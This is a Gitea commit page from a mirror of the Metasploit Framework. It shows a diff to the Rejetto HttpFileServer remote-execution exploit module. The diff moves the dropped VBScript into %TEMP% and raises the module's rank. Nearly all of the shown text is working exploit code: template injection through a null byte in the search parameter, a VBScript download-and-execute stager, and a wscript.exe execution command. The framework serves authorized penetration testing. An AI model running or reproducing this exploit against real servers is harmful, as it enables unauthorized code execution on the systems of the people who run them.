infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Use %TEMP% and update ranking

bug/bundler_fix
jvazquez-r7 2014-10-08 12:12:00 -05:00
parent d90fe4f724
commit 98b69e095c
1 changed files with 7 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
modules/exploits/windows/http/rejetto_hfs_exec.rb
View File

@ -6,7 +6,7 @@
require 'msf/core' require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HttpServer
@ -49,7 +49,6 @@ class Metasploit3 < Msf::Exploit::Remote
register_options( register_options(
[ [
OptString.new('TARGETURI', [true, 'The path of the web application', '/']), OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
OptString.new('SAVE_PATH', [true, 'Target writable path', 'c:\\']),
OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 10]), OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 10]),
], self.class) ], self.class)
end end
@ -86,6 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
file_name = rand_text_alpha(rand(10)+5) file_name = rand_text_alpha(rand(10)+5)
file_ext = '.vbs' file_ext = '.vbs'
file_full_name = file_name + file_ext file_full_name = file_name + file_ext
vbs_path = "%TEMP%\\#{file_full_name}"
vbs_code = "Set x=CreateObject(\"Microsoft.XMLHTTP\")\x0d\x0a" vbs_code = "Set x=CreateObject(\"Microsoft.XMLHTTP\")\x0d\x0a"
vbs_code << "On Error Resume Next\x0d\x0a" vbs_code << "On Error Resume Next\x0d\x0a"
@ -97,27 +97,24 @@ class Metasploit3 < Msf::Exploit::Remote
vbs_code << "Execute x.responseText" vbs_code << "Execute x.responseText"
payloads = [ payloads = [
"save|#{datastore['SAVE_PATH']}#{file_full_name}|#{vbs_code}", "save|#{vbs_path}|#{vbs_code}",
"exec|wscript.exe //B //NOLOGO #{datastore['SAVE_PATH']}#{file_full_name}" "exec|wscript.exe //B //NOLOGO #{vbs_path}"
] ]
print_status("Sending a malicious request to #{target_uri.path}") print_status("Sending a malicious request to #{target_uri.path}")
payloads.each do |payload| payloads.each do |payload|
res = send_request_raw({ send_request_raw({
'method' => 'GET', 'method' => 'GET',
'uri' => "/?search=%00{.#{URI::encode(payload)}.}" 'uri' => "/?search=%00{.#{URI::encode(payload)}.}"
}) })
if res
print_status("#{res.code}\n#{res.body.to_s}")
end
end end
register_file_for_cleanup("#{datastore['SAVE_PATH']}#{file_full_name}") register_file_for_cleanup(vbs_path)
end end
def exploit def exploit
begin begin
Timeout.timeout(datastore['HTTPDELAY']) { super } Timeout.timeout(datastore['HTTPDELAY']) { super }
rescue Timeout::Error rescue Timeout::Error
# When the server stops due to our timeout, this is raised # When the server stops due to our timeout, this is raised
end end
end end